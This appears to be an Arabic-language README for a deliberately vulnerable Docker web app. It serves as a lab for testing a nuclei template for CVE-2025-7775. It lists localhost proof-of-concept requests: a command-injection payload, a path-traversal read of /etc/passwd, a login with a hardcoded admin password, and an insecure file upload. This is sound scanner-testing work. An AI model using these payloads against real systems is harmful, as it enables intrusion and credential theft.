
تطبيق ويب ضعيف داخل حاويات Docker يعرّض لثغرات تنفيذ الأوامر عن بُعد (RCE)، وتجاوز المسارات، وبيانات اعتماد مضمّنة، ورفع ملفات غير آمن؛ بيئة معزولة لاختبار قوالب الماسحات الأمنية.
يوفر هذا المستودع إعدادًا ضعيفًا لاختبار قالب nuclei الخاص بـ CVE-2025-7775.
docker build -t vuln-app .
docker run -d --name vuln-test -p 5000:5000 vuln-app
curl -X POST http://localhost:5000/api/v1/configuration \
-H "Content-Type: application/json" \
-d '{"payload":"ls > /tmp/poc_rce.txt"}'
docker exec -it vuln-test cat /tmp/poc_rce.txt
curl "http://localhost:5000/download?file=/etc/passwd"
curl -X POST http://localhost:5000/api/v1/login \
-H "Content-Type: application/json" \
-d '{"username":"admin", "password":"citrix123"}'
echo "POC FILE UPLOAD" > test.txt
curl -X POST -F "[email protected]" http://localhost:5000/upload
docker exec -it vuln-test cat /tmp/test.txt
docker stop vuln-test
docker rm vuln-test
docker rmi vuln-app